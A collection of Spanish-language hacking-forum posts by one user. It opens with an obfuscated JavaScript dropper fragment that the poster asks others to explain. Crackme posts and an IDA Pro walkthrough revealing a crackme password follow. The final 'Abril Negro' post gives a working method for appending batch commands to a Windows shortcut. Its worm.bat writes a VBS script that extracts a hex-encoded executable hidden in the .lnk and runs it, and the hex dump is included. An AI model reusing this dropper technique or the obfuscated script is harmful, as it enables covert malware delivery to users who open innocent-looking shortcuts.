            if (8 == nngl[lye] && (nngl[lye] = 0), nngl[lye] <= 3) {
                var dzpj = new faefr(zxoum("a6XKUWTxbiy3AZ("));
                dzpj[pcf("!9w9oSyDg)(e0")](), dzpj[mipjn("zKCmP;87XLBfq:S")] = 1, dzpj[sehl("C8DnpB4%x@-8j*R")] = 0, dzpj[ssdie("W1IZ@l%z-P")](nco[nlc("PchLD7hONF53")]), dzpj[mkwm("nl4zGi!QzjC;V")](xvxb), dzpj[rvl("6-OC&xsf60(t7")](), nngl[lye] || ozefl[axvhz("n(LZAZLoC)r")](bsqoi(wzuge("1vqBn*0MR)z")) + qyno("@L&E^tromug") + bsqoi(wnpk("k(@h%.q!aTO84X")) + zgmt(":dIflb($+-Z7!!!") + xvxb, 0, 0)
            }
        }
    } catch (n) {}
}

saludos Flamer y a ver quien me ayuda o le na se la carcomita de que hace este codigo

MOD: URL modificada para evitar clicks indeseados.

35	Programación / Ingeniería Inversa / Busco El Crackme 2 De Devastador	en: 30 Junio 2018, 19:51 pm
Hola amigos ando buscando el crackme 2 de devastador por si alguien lo tiene que me lo pase ya que se callo el link donde tenia la solucion y quiero hacerle video

36	Programación / Ingeniería Inversa / vuelbe crackmes.de solo es un espejo de la pagina	en: 12 Octubre 2017, 02:21 am
hola amigos como la pagina http://www.crackmes.de/ esta fuera de servicio hace ya algún tiempo, aquí les traigo un espejo de ella y es esta pagina, es una copia de la original http://crackmes.cf/ http://crackmes.cf/archive/ http://crackmes.cf/users/ bueno saludos y espero le sirva a alguien

37	Programación / .NET (C#, VB.NET, ASP) / hacer split y almacenarlo en una matriz en vb.net	en: 15 Julio 2017, 21:19 pm
hola quiero hacer una operacion con el comando split pero quiero que el resultado sea almacenado en una matriz ejemplo tengo esta variable llamada cadena que es igual a Código dim cadena as string = "0-1-2-3-4-5-6-7-8-9" y declaro una matriz de 1x10 así Código dim matriz(1,9) as string quiero hacer split y que el resultado sea almacenado en la posicion 0 hasta 10 de la matriz sin hacer esto Código dim vector() as string vector=split(cadena,"-") for x=0 to 9 matriz(0,x)=vector(x) next para que me entiendan quiero aguardar el vector en una fila de la matriz Saludos Flamer y quiero ahorrarme el ciclo

38	Programación / Programación General / Concatenar cadenas o string verticalmente	en: 10 Julio 2017, 22:32 pm
hola amigos hoy se me ocurrió una idea y es que común mente en cualquier lenguaje de programación si queremos concatenar 2 cadenas se ase lo siguiente Nota: puse el signo mas para que se entendiera, no me estoy refiriendo a ningún lenguaje en particular Código cadena3=cadena1 + cadena2 si cadena1 vale "01234" y cadena2 vale "56789" entonces el resultado de cadena3 seria "0123456789" eso es para todos los lenguaje ahora volbiendo al tema, si tenemos que cadena1 es igual a " 0 1 2 3 4 " y cadena2 es igual a " 5 6 7 8 9 " ahora hacemos la concatenación que no se como es y es lo que quiero que me digan si se puede, quiero que el resultado sea este " 05 16 27 38 49 " a eso me refiero si se puede hacer saludos Flamer

39	Programación / Ingeniería Inversa / Resolviendo El Crackme 3 De EnigmaGroup Con IDA-Pro	en: 6 Mayo 2017, 05:10 am
Anteriormente había dicho que no haría tutorial de el crackme 3 de EnigmaGroup pero como trato de aprender IDA are una excepción y resolveré el crackme con IDA-Pro. bueno si no tienen el crackme lo pueden descargar desde su pagina oficial esta: https://www.enigmagroup.org/pages/cracking ahora ya que descargaron el crackme pasaremos abrirlo con IDA, pero una cosa muy importante antes de intentar crackear un programa con IDA deben de saber si el programa o crackme es de 32 o 64 bits. una solución para saber si el crackme es de 32 o 64 bit es abrirlo con el RDG Detector, así que ami al abrirlo con el me sale la siguiente imagen y como ven donde esta marcado de rojo dice que es de 32 bits, asi que al abrirlo con IDA lo abriremos con IDA 32 bits que es esta. para los que no saben IDA te instala 2 versiones por eso es muy importante saber que versión es el programa que queremos reversear. A continuación nos aparecerá una pantalla la cual daremos clic en New acto seguido ubicaremos el crackme 3 de enigma group, el cual yo lo tengo en la carpeta descargas después damos clic en abrir y se abrirá la siguiente ventana donde seleccionamos la primera opción y damos clic en OK bueno ya con esto tendremos el crackme abierto y listo para crackear así que primero buscaremos en las apis que utiliza el crackme para comparar los seriales y para eso nos iremos ala pestaña Imports y nos muestra lo siguiente Como ven utiliza la misma api que en los crackmes anteriores. bueno una cosa muy importante no se asusten ya que IDA es mas extenso y laborioso que ollydbg, ya que tiene mas instrucciones pero poco a poco iremos aprendiendo ya que yo todavía no lo domino y una de las cosas que extraño de el ollydbg que no distingo las instrucciones de otras ya que en el desensamblado que mas adelante les presentare, todas las instrucciones tienen el mismo color y no se distinguen a simple vista tengo que seleccionarlas y para eso ando fijando mucho la vista en fin ojala en versiones futuras mejoren eso. ahora para no andar buscando en el desensamblado la api __vbaVarTstEq haremos lo siguiente, nos iremos a la pestaña IDA View-A que es la que nos muestra el desensamblado del programa y como verán es muy distinto a el ollydbg pero como dije no se asusten que todo tiene remedio, bueno ya que estamos aqui nos iremos al icono siguiente también pueden dar clic en la pestaña Search y buscar la opción Text la cual tiene el mismo icono que seleccionamos. a continuación muestra la siguiente ventana y escribimos el nombre de la api que deseamos encontrar y marcamos las mismas instrucciones y al ultimo presionamos OK después de esto se abrirá una nueva pestaña donde nos muestra las direcciones donde se utiliza dicha api, así que yo ubique el call donde se hacen las comparaciones de las cadenas el cual para eso fui analizando cada resultado que me dio la búsqueda y es este para irnos a esa dirección solo damos clic sobre el y nos redirige hasta esta ubicación Asi que ya tenemos ubicado donde compara las string, asi que para eso pondremos un break-point y tracearemos con F7 igual que ollydbg y para eso solo damos clic al circulo azul de esa linea hasta que se haga rojo y nos marque la linea asi y ahora pasaremos a ejecutar la aplicación con F9 y si les aparece la siguiente ventana seleccionamos la siguiente opción Damos OK y por ultimo volvemos a presionar F9 Ahora si nos aparece la ventana del crackme y así que ingresaremos la contraseña que sea, yo ingresare "123456" y presionamos el botón submit al presionar el botón el programa se detiene justo en el break-point que pusimos este ahora presionaremos F7 para ingresar en el CALL e ir revisando la pila o stack Nota: para ir revisando que es lo que se encuentra en el stack iremos dando clic sobre las instrucciones que digan Debug como estas y el contenido es mostrado en la sección del DUMP Bueno asi que al tracear con F7 e llegado a la siguiente sección y al pararme en esta linea reviso el stack o pila y veo que me muestra lo siguiente y presiono sobre la primera y me muestra lo siguiente en el Dump ahora presiono la segunda y guala la clave es "Debug54321" y al ingresar esa clave en el crackme me muestra lo siguiente Bueno eso es todo amigos espero les haya gustado Saludos Flamer

Programación / Scripting / [Abril Negro] Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk

en: 6 Abril 2017, 02:11 am

Este tema lo publique en mi blog y ahora se los traigo aqui para el abril negro

Ase mucho en mis principios uní un archivo lnk con un exe este era ejecutable desde el lnk, asiendo doble clic sobre el y ahorita que me acuerdo yo en ese entonces usaba el comando debug del antiguo símbolo del sistema para recrear el ejecutable.

trate este tema en el siguiente hilo

https://foro.elhacker.net/analisis_y_diseno_de_malware/unir_autorun_y_exe-t271077.10.html

en el un usuario me tomo a locura lo que estaba diciendo eso fue 2009 pero yo cuando había hecho esos experimentos por llamarlos así hacia mas años, aun no recuerdo si seria en el 2007 o 2006 y como dije usaba el comando debug, yo nunca dije en el foro como lo hice hasta ahora lo explico.

primeramente crearemos un acceso directo al símbolo del sistema en el escritorio, no explicare como crearlo creo que ya tienen las bases suficientes para saber.

ya que lo tengan creado daremos clic derecho sobre el y daremos clic en propiedades y en el cuadro de texto de destino que es este:

pondremos lo siguiente

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

y ahora abriremos el bloc de notas y dentro de el pondremos los comandos de nuestro bat, yo pondré estos

OJO= fíjense que deje un espacio de 3 lineas y después puse los comandos pueden ser 2 o una, esto es para que no se mezcle con los bites del lnk.

ahora pasaremos a aguardarlo, yo le pondré 96.txt, ya que no es necesario que lleve la extensión bat

ya que tenemos el archivo lnk y los comandos que irán debajo del lnk pasaremos a juntar los, para eso abriremos el símbolo del sistema y nos fijamos en la carpeta del escritorio y teclamos lo siguiente

Nota: mi archivo lnk tiene por nombre "6.lnk" y el archivo que lleva los comandos se llama "96.txt"

copy /b 6.lnk+96.txt w.lnk

nos que daría un archivo llamado "w.lnk", que al ejecutarlo ejecuta los comandos que tenia el archivo 96.txt.

creo que ya tienen una idea de como seguir, así que crearemos un bat que genere un archivo vbs, el cual generara un exe así que el código del bat seria este

Código

 
@echo off
echo option explicit                                           >worm.vbs
echo Dim x,objsystem,file,i,f,largo,bit,bytes,shell            >>worm.vbs  
echo Set objsystem = CreateObject("Scripting.FileSystemObject")>>worm.vbs 
echo set shell = createobject("wscript.shell")                 >>worm.vbs
echo Set file = objsystem.getFile("w.lnk")                     >>worm.vbs  
echo largo=file.size                                           >>worm.vbs 
echo Set f = file.OpenAsTextStream()                           >>worm.vbs  
echo for i=1 to largo                                          >>worm.vbs
echo     bytes = bytes + f.read(1)                             >>worm.vbs  
echo next                                                      >>worm.vbs 
echo f.close                                                   >>worm.vbs
echo bit=split(bytes,"==codingvbs==")                          >>worm.vbs  
echo set file = objsystem.createtextfile("Crackme1.exe")       >>worm.vbs 
echo for x=1 to len(bit(2)) step 2                             >>worm.vbs 
echo    bytes = mid(bit(2),x,2)                                >>worm.vbs
echo    file.write(chr("&H" + bytes))                          >>worm.vbs
echo next                                                      >>worm.vbs
echo file.close                                                >>worm.vbs
echo wscript.sleep 2000                                        >>worm.vbs
echo shell.run "Crackme1.exe",1                                >>worm.vbs
wscript.exe worm.vbs

al bat lo llamaremos "comandos.bat", ahora crearemos un archivo que contendra los bites del exe en valores hexa decimales, al cual llamaremos "code.txt" y contendrá lo siguiente

Código

==codingvbs==4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000008F8AF9DBCBEB9788CBEB9788CBEB978848F79988CAEB9788A2F49E88CAEB978822F49A88CAEB978852696368CBEB97880000000000000000504500004C0103007180B7430000000000000000E0000F010B01060000200000002000000000000008120000001000000030000000004000001000000010000004000000010000000400000000000000005000000010000044DF00000200000000001000001000000000100000100000000000001000000000000000000000004426000028000000004000001406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280200002000000000100000A80000000000000000000000000000000000000000000000000000002E746578740000008C190000001000000020000000100000000000000000000000000000200000602E64617461000000040A0000003000000010000000300000000000000000000000000000400000C02E727372630000001406000000400000001000000040000000000000000000000000000040000040C52C25411000000000000000000000004D535642564D36302E444C4C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FCB149738D69497373104A734E624973D568497324734773E14B3C7302624973A7663C732C453C73E3423C73292F48739A6249739A63497364B34973AF443C736FD83B7378B73B738A69497385E33C7309B449737C6747735B4E3C731D6649734E6349737F9D4A73A1B24973CE624973CE63497309644873026349733D5D49733EDE3A73CA164A73DC9D4A7336B14973EA204973BAB44973350F4973FE473C73D7503C73000000001500100002234000000000000A234000C0104000000000000100000001000000DA224000000000007DC39425AD49B25405000800E423400000000000EB23400005000800E324400000000000EA24400005000800F425400000000000FB2540000000000000000000FF253C104000FF2558104000FF2564104000FF2530104000FF251C104000FF256C104000FF250C104000FF257C104000FF2534104000FF2578104000FF2570104000FF2560104000FF2548104000FF255C104000FF2510104000FF2504104000FF258C104000FF2500104000FF2598104000FF2568104000FF2538104000FF2550104000FF2594104000FF2590104000FF2544104000FF2508104000FF2584104000FF252C104000FF2514104000FF2520104000FF25A0104000FF259C104000FF2518104000FF2528104000FF2574104000FF2524104000FF2588104000FF2554104000FF2540104000FF254C104000FF2580104000000068F4164000E8EEFFFFFF000000000000300000004000000000000000A1B68322BCF5C74EA7E4A3927EB7E3510000000000000100000000000000000050726F796563746F310000000000000000000000FFCC310003FE22228A455D81448B4E885B15F0513142E3E915F7541E4B93B8F05E7BD708073A4FAD339966CF11B70C00AA0060D393000000000000000000000000000000000000000000000000000000000000000000000000E803000062030000000500466F726D31000D011D002020202020437261636B6D65202337202020506F722020466C616D6572001901004200220123060300006C740000FE0200000000010001002040000001000400E8020000160000002800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000240500466F726D310026002700352D000000B3010000880E0000710700004603FF011C0000000106004672616D653100030578007800A70D9F06120000FF0135000000020A007478745F53657269616C000204F0006801C70B77010B0F00496E677265736120456C20436F6465001202002402FF032B000000030800436F6D6D616E6431000401090056657269666963617200044803380417077701110100FF02020400000007000000DC1E400050000000FE22228A455D81448B4E885B15F0513100000000000000000000000000000000000000009001000000000000000000000000000000000000000000004104000000000000581240004C00000056423521F01F56423645532E444C4C00000000002A000000000000000000000000000A000A0C000009040000000000008C1740001CF0300000FFFFFF080000000100000001000000E9000000A41640009C1640001412400078000000810000008B0000008C000000000000000000000000000000000000004B657947656E6D650050726F796563746F31000050726F796563746F31000000F4010000E41C400000000000E021400040264000FC0900000830400016114000003040002A005C00410043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C0046006C0061006D00650072005C004D0069007300200064006F00630075006D0065006E0074006F0073005C004800610063006B0069006E0067005C0043007200610063006B0069006E0067005C004D0069007300200043007200610063006B006D00650073005C0043007200610063006B006D006500200037005C00500072006F0079006500630074006F0031002E0076006200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1640000100000001000000E41C4000000000003C214000FFFFFFFF00000000381D40000830400001000000401A4000000000000000000000000000401A400001000000A01D400000000000441A4000010000004C1A400000000000481A4000040000004C1A40000400B70168006C00EC1A4000F032400000000000A0DA200000000000B01D4000C01D4000400018003C000000D01D4000020003000000000000000000FC1A400050CF2000E01D4000020003004000110040000000681E4000030003000000000000000000741B400060CF2000781E40000300030040000D0044000000841E4000010003000000000000000000D01B400070CF2000941E40000100030040001F00480000009C1E4000FFFFFFFF00000000000000001C1C400080CF2000AC1E4000FFFFFFFFD21C4000DF1C4000B81C4000C51C4000000000004C1A4000C8194000EE114000F4114000FA11400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000741A4000C8194000EE114000F4114000FA114000B01C400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1A4000C8194000EE114000F4114000FA1140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C41A4000C8194000EE114000F4114000FA114000000000000000000000000000000000000000000000000000BD1C4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000816C24043F000000E933050000816C240447000000E976060000816C2404FFFF0000E949070000816C2404FFFF0000E94C080000000000002C3040007C214000FFFFFFFF000000001C304000988DAE1D6306F14EABE1CAAE39F6073E0A00010001000100381D4000000000000000000000000000841D4000090400000A0C00000000000002000000C8194000FFFFFFFF201F40000000000000000000000000007C1D400005000000681D4000FFFF0000838001000000000073007400650069006E002900101F40001C1F4000466F726D3100000050726F796563746F3100000042E3E915F7541E4B93B8F05E7BD7080757CC2B8E8DA552469C17B77ECC47F6FCFE22228A455D81448B4E885B15F0513144E923EC7903FB479066AA7CD42C4AF7E24EAD339966CF11B70C00AA0060D3937478745F53657269616C00002E3DFBFCFAA06810A73808002B3371B5433A5C4172636869766F732064652070726F6772616D615C4D6963726F736F66742056697375616C2053747564696F5C564239385C5642362E4F4C420000000056420000EC1D4000000000000600000009000000FC1D40003C1E4000D03240000000000000000000A8161C00F24EAD339966CF11B70C00AA0060D393436F6D6D616E643100000000EA4EAD339966CF11B70C00AA0060D3934672616D653100003A4FAD339966CF11B70C00AA0060D393466F726D00000000090000006B65726E656C333200000000120000004973446562756767657250726573656E74000000B81E4000C81E400000000400D43240000000000000000000A1DC3240000BC07402FFE068DC1E4000B8A0114000FFD0FFE0000000436F72726563746F000000004D616C000C0054000000000000000000E14EAD339966CF11B70C00AA0060D393F14EAD339966CF11B70C00AA0060D3937200000043006F00720072006500630074006F002E002E002E002E00460065006C0069007300690064006100640065007300200041006D00690067006F002000410068006F00720061002000500072006F006700720061006D006100200045006C0020004B0065007900670065006E002E002E002E0000001000000043006F00720072006500630074006F000000000022000000530065007200690061006C00200049006E0063006F00720072006500630074006F0000000A0000004500720072006F0072000000564241362E444C4C000000005F5F766261467265655661724C697374000000005F5F766261566172447570005F5F7662614F626A53657400000000005F5F76626153657453797374656D4572726F72005F5F7662614578697450726F630000005F5F766261467265654F626A000000005F5F76626146726565537472000000005F5F76626148726573756C74436865636B4F626A000000005F5F766261493453747200005F5F7662614F6E4572726F72000000005F5F766261467049340000003C2140000000000000000000000000000000000000000000F4204000182140000000F906FFFF00000000000002000360D42040000000000000000000000000001E0000000000FD06FFFF00000000000003000360D42040000000000000000000000000001E00000000000000C8194000FFFFFFFF000000000200000000000000E020400000000000D8204000D4204000D4204000000000000000000000000000540000000400000000000000E41C4000FFFFFFFF00000000D4204000000000000000000000000000FFFFFFFF00000000401E4000D01D4000E0324000401E4000681E4000E4324000401E4000841E4000E8324000401E40009C1E4000EC324000CCCCCCCCCCCCCCCCCCCCCCCCE9E9E9E9CCCCCCCCCCCCCCCCCCCCCCCC558BEC83EC14681611400064A100000000506489250000000083EC205356578965ECC745F0A81040008B75088BC683E0018945F483E6FE89750833DB895DF88B0E56FF5104895DE0895DDC66837E38FF750FDD05D0104000FF15881040008946346A01FF15241040008B1656FF9200030000508D45DC50FF15281040008BF88B0F8D55E05257FF91A0000000DBE23BC37D1268A0000000682C1F40005750FF15181040008B45E050FF15741040008946348D4DE0FF159C1040008D4DDCFF15A01040008B463499B911000000F7F989563483FA0275148B1656FF92F80600003BC37D2968F8060000EB158B75088B0656FF90FC06000085C07D1268FC06000068C01D40005650FF1518104000FF15201040009B681E234000EB138D4DE0FF159C1040008D4DDCFF15A0104000C3C38B45088B0850FF51088B45F48B4DE464890D000000005F5E5B8BE55DC20400909090558BEC83EC0C681611400064A100000000506489250000000083EC185356578965F4C745F8D81040008B75088BC683E0018945FC83E6FE568975088B0EFF510433DB895DE866895E38E866FBFFFF8BF8FF15141040003BFB740666C74638FFFF8B1656FF9204030000508D45E850FF15281040008BF053568B0EFF918C0000003BC3DBE27D12688C000000683C1F40005650FF15181040008D4DE8FF15A0104000895DFC68F6234000EB0A8D4DE8FF15A0104000C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8E810400033F68975FC8B4508508B08FF51048B3D84104000B904000280894DB4B80A000000894DC4BB080000008975BC8975AC89758C8D558C8D4DCC8975DC8975CC89759C8945AC8945BCC74594C81F4000895D8CFFD78D559C8D4DDCC745A4501F4000895D9CFFD78D55AC8D45BC528D4DCC50518D55DC5652FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146807254000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC2040090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8F810400033F68975FC8B4508508B08FF5104B9040002808975DC8975CC8975BC8975AC89759C89758C8B3584104000894DB4B80A000000894DC4BF080000008D558C8D4DCC8945AC8945BCC7459408204000897D8CFFD68D559C8D4DDCC745A4E01F4000897D9CFFD68D55AC8D45BC528D4DCC50518D55DC6A1052FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146818264000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909E9E9E9E6C260000FFFFFFFFFFFFFFFF14270000001000000000000000000000000000000000000000000000222700002C2700003A2700004E2700005E2700006C270000822700009A270000AA270000BA270000CA27000053020080D8270000EA270000FC2700000628000014280000282800003A280000482800005E28000068280000842800009A280000A8280000BA280000CE280000D8280000EA280000FC2800000A2900001C290000640000802A29000038290000442900004E29000058290000622900006C2900007C290000000000004D535642564D36302E444C4C000000005F4349636F73000000005F61646A5F667074616E000000005F5F766261467265655661724C697374000000005F61646A5F666469765F6D36340000005F61646A5F667072656D310000005F5F76626153657453797374656D4572726F720000005F5F76626148726573756C74436865636B4F626A000000005F61646A5F666469765F6D33320000005F5F7662614578697450726F630000005F5F7662614F6E4572726F72000000005F5F7662614F626A5365740000005F61646A5F666469765F6D313669000000005F61646A5F66646976725F6D3136690000005F434973696E000000005F5F76626143686B73746B0000004556454E545F53494E4B5F416464526566000000446C6C46756E6374696F6E43616C6C0000005F61646A5F66706174616E0000004556454E545F53494E4B5F52656C65617365000000005F4349737172740000004556454E545F53494E4B5F5175657279496E746572666163650000005F5F76626145786365707448616E646C6572000000005F61646A5F667072656D000000005F61646A5F66646976725F6D3634000000005F5F7662614650457863657074696F6E000000005F43496C6F67000000005F61646A5F666469765F6D333269000000005F61646A5F66646976725F6D3332690000005F5F7662614934537472000000005F61646A5F66646976725F6D3332000000005F61646A5F666469765F720000005F5F7662615661724475700000005F5F766261467049340000005F43496174616E0000005F616C6C6D756C0000005F434974616E000000005F4349657870000000005F5F76626146726565537472000000005F5F766261467265654F626A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000